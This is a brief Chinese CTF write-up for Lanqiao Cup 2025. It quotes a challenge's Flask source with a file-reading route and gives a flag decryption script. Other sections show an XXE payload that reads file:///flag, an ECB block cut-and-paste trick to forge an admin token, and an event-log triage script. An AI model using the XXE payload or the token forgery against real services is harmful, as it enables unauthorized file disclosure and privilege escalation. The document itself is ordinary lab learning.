蓝桥杯2025 wp
flowzip
一把梭了

enigma
给的是赛博厨子,那用赛博厨子解密即可

HELLO CTFER THISI SAMES SAGEF ORYOU
黑客密室逃脱
获取app.py
import os
from flask import Flask, request, render_template
from config import *
# author: gamelab
# Flask application object; the route decorators further down register on it.
app = Flask(__name__)

# Key used to obscure the simulated secret, followed by the simulated secret
# itself. Both constants arrive through the star import of `config`, whose
# contents are not shown on this page.
encryption_key = ENCRYPTION_KEY
sensitive_info = SENSITIVE_INFO
def simple_encrypt(text, key):
    """Return the hex string of ``text`` with a repeating key added to it.

    Each character's code point is added to the code point of the key
    character at the same position (the key wraps around), and the sums are
    emitted as bytes in hexadecimal.

    Raises:
        ValueError: if a sum does not fit in one byte (0..255).
        ZeroDivisionError: if ``key`` is empty and ``text`` is not.

    NOTE(review): this is a reversible additive transform, not encryption in
    any cryptographic sense; whoever learns the key recovers the text. Real
    secrets need a vetted authenticated cipher and a key kept out of reach.
    """
    summed = bytes(
        ord(ch) + ord(key[pos % len(key)])
        for pos, ch in enumerate(text)
    )
    return summed.hex()
# Obscure the simulated secret once, at import time.
encrypted_sensitive_info = simple_encrypt(sensitive_info, encryption_key)

# Simulated log text; it embeds the hex ciphertext produced above.
log_content = f"用户访问了 /secret 页面,可能试图获取 {encrypted_sensitive_info}"

# Simulated hidden file body; it carries the key in clear text.
hidden_file_content = f"解密密钥: {encryption_key}"

# Root directory the /file route is meant to stay inside.
SAFE_ROOT_DIR = os.path.abspath('/app')

# NOTE(review): the key file is written into SAFE_ROOT_DIR, the same tree the
# /file route reads from, while the ciphertext is embedded in log_content.
# Key material should live outside any directory a request handler can serve.
with open(os.path.join(SAFE_ROOT_DIR, 'hidden.txt'), 'w') as f:
    f.write(hidden_file_content)
@app.route('/')
def index():
    """Serve the landing page by rendering the ``index.html`` template."""
    page = render_template('index.html')
    return page
@app.route('/logs')
def logs():
    """Render ``logs.html`` with the module-level simulated log text.

    NOTE(review): ``log_content`` embeds the hex ciphertext of the simulated
    secret, and no access check is visible in this handler, so the page
    discloses that ciphertext to whoever requests it.
    """
    context = {'log_content': log_content}
    return render_template('logs.html', **context)
@app.route('/secret')
def secret():
    """Serve the ``secret.html`` template; no request data is read here."""
    page = render_template('secret.html')
    return page
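@app.route('/file')
def file():
    """Render the text of the file selected by the ``name`` query parameter.

    A missing ``name`` renders ``no_file_name.html``. The request is refused
    with ``no_premission.html`` when the resolved path lies outside
    ``SAFE_ROOT_DIR``, contains the substring ``config``, or points at a
    directory or unreadable file. A file that does not exist renders
    ``file_not_found.html``.

    Returns:
        The rendered template for whichever case applies.
    """
    file_name = request.args.get('name')
    if not file_name:
        return render_template('no_file_name.html')

    # Resolve symlinks and ".." on both sides, then compare whole path
    # components. A plain string-prefix test (startswith) would also accept a
    # sibling directory whose name merely begins with the root's name.
    try:
        root = os.path.realpath(SAFE_ROOT_DIR)
        full_path = os.path.realpath(os.path.join(root, file_name))
        inside_root = os.path.commonpath([root, full_path]) == root
    except ValueError:
        # Raised for an embedded NUL byte or for paths that cannot be compared.
        return render_template('no_premission.html')

    # NOTE(review): a substring deny-list is brittle and still leaves every
    # other file under the root readable (application source, key files).
    # An explicit allow-list of servable files would be the sturdier control.
    if not inside_root or 'config' in full_path:
        return render_template('no_premission.html')

    try:
        with open(full_path, 'r') as f:
            content = f.read()
    except FileNotFoundError:
        return render_template('file_not_found.html')
    except (IsADirectoryError, PermissionError):
        # Without this branch the exception leaves the handler; the app is
        # started with debug=True, so the interactive debugger page would be
        # shown to the client instead of a plain refusal.
        return render_template('no_premission.html')
    return render_template('file_content.html', content=content)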
if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0')

hidden.txt
解密密钥: secret_key3624

解密即可
# Key value as shown in hidden.txt above; passed to simple_decrypt below.
encryption_key = "secret_key3624"
def simple_encrypt(text, key):
    """Return the hex string of ``text`` with a repeating key added to it.

    Copy of the routine from the challenge's app.py: each character's code
    point is added to the code point of the key character at the same
    position (the key wraps around) and the sums are hex-encoded.

    Raises:
        ValueError: if a sum does not fit in one byte (0..255).
        ZeroDivisionError: if ``key`` is empty and ``text`` is not.
    """
    summed = bytes(
        ord(ch) + ord(key[pos % len(key)])
        for pos, ch in enumerate(text)
    )
    return summed.hex()
def simple_decrypt(encrypted_text, key):
    """Invert ``simple_encrypt``: hex-decode, subtract the repeating key.

    Args:
        encrypted_text: hexadecimal string as produced by ``simple_encrypt``.
        key: the same key string that was used to produce it.

    Returns:
        The recovered text, decoded as UTF-8.

    Raises:
        ValueError: on invalid hex, or when a byte is smaller than the key
            character it is paired with (the difference would be negative).
        ZeroDivisionError: if ``key`` is empty and the input is not.
    """
    raw = bytes.fromhex(encrypted_text)
    recovered = bytearray(
        value - ord(key[pos % len(key)])
        for pos, value in enumerate(raw)
    )
    return recovered.decode('utf-8')
# Hex ciphertext to reverse (presumably the value embedded in the log text
# that the /logs page renders; the write-up does not say where it was copied
# from).
enc = "d9d1c4d9e0aac5a4caa969989661d4cbc8a392a898cdc7a66c6d679aa09a9ca4cbab98a1c6af636668b1"
flag = simple_decrypt(enc, encryption_key)
print(flag)  # output: flag{6f9e06bd-afe1-49bb-975f-592f796a6006}
xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "file:///flag"> ]>
<creds>&goodies;</creds>

然后即可拿到flag
shadow
打断点

然后看寄存器即可

ECB
先用AAAAAAAAAAAAAAAAadmin注册
得到密文KW7riR/XPwngxZyZVMhtk7hAuF3tGSMt5sLqai55nNE=
将密文base64解码后取出最后16字节,再进行base64编码
import base64

# Base64 ciphertext returned by the service for the registration above.
base = "KW7riR/XPwngxZyZVMhtk7hAuF3tGSMt5sLqai55nNE="

# Decode, keep only the trailing 16 bytes, and re-encode them as Base64 text.
# NOTE(review): the section heading names ECB. In that mode every block is
# encrypted on its own, so a block cut out of one ciphertext is still a valid
# ciphertext. Tokens need an integrity check (a MAC or an AEAD mode), not ECB.
tail_block = base64.b64decode(base)[-16:]
ciphertext = base64.b64encode(tail_block).decode()
print(ciphertext)

EVTX
先导出为xml
搜索所有.后面的内容
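# Triage helper for an event log that was exported to XML beforehand: list
# the distinct three-character tokens that follow a '.' anywhere in the text.
import os
import random
import re

file = "C:\\Users\\Lenovo\\Downloads\\e.xml"

# Stop with a clear message when the export is missing. With the page's
# indentation lost it is unclear how the original was nested, but as written
# a missing file would leave `content` undefined for the search below.
try:
    with open(file, 'r', encoding="utf8") as f:
        content = f.read()
except FileNotFoundError:
    raise SystemExit(f"input file not found: {file}") from None

# Capture exactly three word characters after each '.', then de-duplicate.
# This is a coarse filter: longer extensions are truncated ('docx' is
# reported as 'doc') and dotted numbers match too ('168', '100', '000'), so
# every hit still has to be located in the original log.
pattern = r'\.(\w{3})'
matches = set(re.findall(pattern, content))
print(matches)  # printed result: {'exe', '000', '168', 'com', 'mic', 'doc', '100'}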
注意到doc,定位原文得到
C:\Admin\confidential.docx
许可协议:
CC BY 4.0